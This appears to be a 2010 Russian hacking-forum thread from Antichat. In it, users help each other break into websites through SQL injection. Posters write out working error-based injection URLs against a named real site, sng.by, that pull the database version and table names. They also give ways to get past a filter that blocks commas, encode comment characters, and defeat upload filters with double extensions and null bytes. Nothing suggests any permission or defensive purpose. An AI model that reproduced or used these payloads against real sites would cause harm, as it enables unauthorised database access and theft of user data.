Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.05.2010, 03:49
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
_http://sng.by/articles/1.html
можно тут че заимутить? = \
|
|
|
12.05.2010, 03:55
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от GroM88
_http://sng.by/articles/1.html
можно тут че заимутить? = \
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html
|
|
|
|
12.05.2010, 04:25
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от AHMED HASSAN
first sorry for my English
i don't speak Russian fluently
i was asking about
1- how to bypass php filter on uploading image is there is
any way to bypass i know the ways of live http header and tamper data and so on
what if site changes name from upload.php to 111.gif ????
is there is any way to bypass
1111.gif.php
1111.gif%00.php - Know triggered or not
|
|
|
|
12.05.2010, 07:28
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Сообщение от warlok
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html
Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \
|
|
|
|
12.05.2010, 07:51
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от GroM88
Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \
Всё примерно так же как и в обычной:
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+table_name+from+information_schema.tables+limit+19,1),floor(rand(0)*2))+from+information_schema.tables +group+by+2)a)--+.html
Стандартно ищешь нужные таблицы лимитом,потом колонки итд.
|
|
|
|
12.05.2010, 08:18
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать
|
|
|
|
12.05.2010, 08:37
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от zuzzz
проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать
AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 
|
|
|
|
12.05.2010, 08:51
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296
Репутация:
0
|
|
Сообщение от Ctacok
AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 так не получится. Я же писал, что параметр разбивается на части по запятым.
и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
|
|
|
|
12.05.2010, 09:00
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
проскань порты
mysql 3306
можешь попробовать
http://site.com:3306/
|
|
|
|
12.05.2010, 09:12
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от zuzzz
так не получится. Я же писал, что параметр разбивается на части по запятым.
и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
